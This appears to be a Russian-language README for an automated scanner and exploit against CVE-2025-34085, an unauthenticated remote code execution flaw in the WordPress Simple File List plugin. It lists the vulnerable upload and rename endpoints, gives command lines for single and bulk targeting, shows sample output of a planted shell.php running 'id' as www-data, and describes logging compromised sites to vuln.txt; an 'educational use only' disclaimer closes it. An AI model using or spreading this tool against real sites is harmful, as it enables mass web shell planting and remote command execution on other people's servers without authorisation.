
Автоматизированный сканер и эксплойт для CVE-2025-34085, неаутентифицированное RCE в плагине WordPress Simple File List. Поддерживает многоцелевое сканирование, загрузку веб-шелла и удаленное выполнение команд.
Автоматический инструмент для обнаружения и эксплуатации удаленного выполнения кода (RCE) без аутентификации в плагине WordPress Simple File List, особенно уязвимых к CVE-2025-34085.
Оснащен системой автоматической очистки целей и поддержкой многопоточности для эффективной работы в больших масштабах.
Загрузка файла без аутентификации
/wp-content/plugins/simple-file-list/ee-upload-engine.phpПереименование файла в .php
/wp-content/plugins/simple-file-list/ee-file-engine.phpВыполнение удаленной полезной нагрузки
python3 main.py -u http://target.com --cmd "id"
Поместите список целей в файл targets.txt, по одной на строку:
python3 main.py --cmd "uname -a"
| Аргумент | Описание |
|---|---|
-u | Одиночная цель (например: http://example.com) |
--cmd | Команда для выполнения на цели (по умолчанию: id) |
--inline | Использовать встроенную полезную нагрузку (без параметра ?cmd=) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Успешные цели автоматически сохраняются в файл vuln.txt.
main.py — Основной скриптtargets.txt — Список целейclean_targets.txt — Результаты нормализации URLvuln.txt — Журнал успешно эксплуатированных целейtargets.txtАдминистраторам сайтов WordPress рекомендуется:
Этот проект предназначен только для обучения и легитимного тестирования.
Использование в незаконных целях — ответственность каждого отдельного лица.
Cyberlone Indonesia не несет ответственности за неправомерное использование этих инструментов.
Лицензия: MIT License
Можете свободно использовать, модифицировать и распространять в легитимных и ответственных целях.
Cyberlone Indonesia
🛠️ Исследовательская группа и эксплуатация
🔗 GitHub: https://github.com/yukinime
👨💻 0xgh057r3c0n
🔗 GitHub: github.com/0xgh057r3c0n